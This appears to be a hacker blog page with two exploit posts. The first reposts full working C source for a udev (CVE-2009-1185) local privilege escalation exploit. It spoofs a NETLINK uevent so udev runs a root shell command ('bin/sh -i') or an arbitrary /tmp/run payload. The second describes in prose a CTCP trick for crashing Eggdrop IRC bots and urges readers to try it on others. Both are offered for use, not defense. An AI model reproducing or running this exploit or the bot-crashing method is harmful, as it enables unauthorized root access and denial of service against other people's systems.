Help pay for xds lawyer fees.
LR

CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jonos code! Yes, when it is neater and, nicer than the alternatives ofcourse, but NOT when theyre crippled :) k thx. So, this is bein posted now, abit late but, better than never..

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int main(int argc, char **argv) {
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "a@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=bin/sh -i") +1;  //-- root cmd here
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}

XD

comments: 2 » tags: , ,

Eggdrop 1.6.19+ctcpbugfix(and below) ctcp bug

Posted on 26th September 2011 in Exploits

So, i guess you all wondered, how did this work etc etc..and yes, there is a few ‘ways’ i have seen wich, as i saw, none of worked… so i played around, with the 1.6.19+ctcpfix version, YES the ‘fix’ version :P and what do i find…
well, instead of your usual /dcc chat try /ctcp chat , thats it.
Simple as, and was hiding for long time.. works effectively on eggdrop BSD built, and on RH built, but not tested on ALL packages, altho i suspect the same buffer is responsible for all these bugs, this was even in wraith’s src at one stage i believe,… but fixed much much sooner than eggdrop.. i guess some of your botpax out there, are easy to crasxh!
have phun!
And, modufy the ctcp command, and flooding the unit/target with requests, also works, also fake file dcc sends seem to be accepted, and no, i wont show you this code, but it is VERY simple mirc scripting..
Discovered by who the fk knows,
Exploited by me ,
Credits to whoever else has found this, but, no one else was able to reproduce this properly yet, and, why does this occur, on a darn ctcpfix version :s bad src… the safest way, is to download and use the oldest eggdrop src, wich does NOT suffer from the bug as i know of , and this is dev1.6.8 version wich has ipv6+ssl and, will soon overtake the sillyarse 1.6.20 and below branch… the 1.6.8 somehow was lost and, its confgs alittle different but, i run it on my box… it is secure alternative and simply needs 2 changes to operate same way, that is replacing ip with vhost and ip6 with vhost6… and ppl have not used it, because of that reason…so pathetic.. use this version, so , as they have said, all other versions are buggy, until 1.6.20, anything of those are all buggy, they really want to release a good build of the ipv6+ssl but people refuse to budge, so, i will tell admins of boxes, setup an eggy config maker, and that way, it would b easier..make it advanced as the person would want it to be, so use an advanced configs, and that way, people will use your proper eggy, and not use .patch sets etc for old crap! Oh and maybe reading eggheads.org news might help just alittle ;p
Enjoy the /ctcp chat while it lasts :p
Cheers
xd

My new fav pic:

^^ thats my kinda country!

comments: 3 » tags: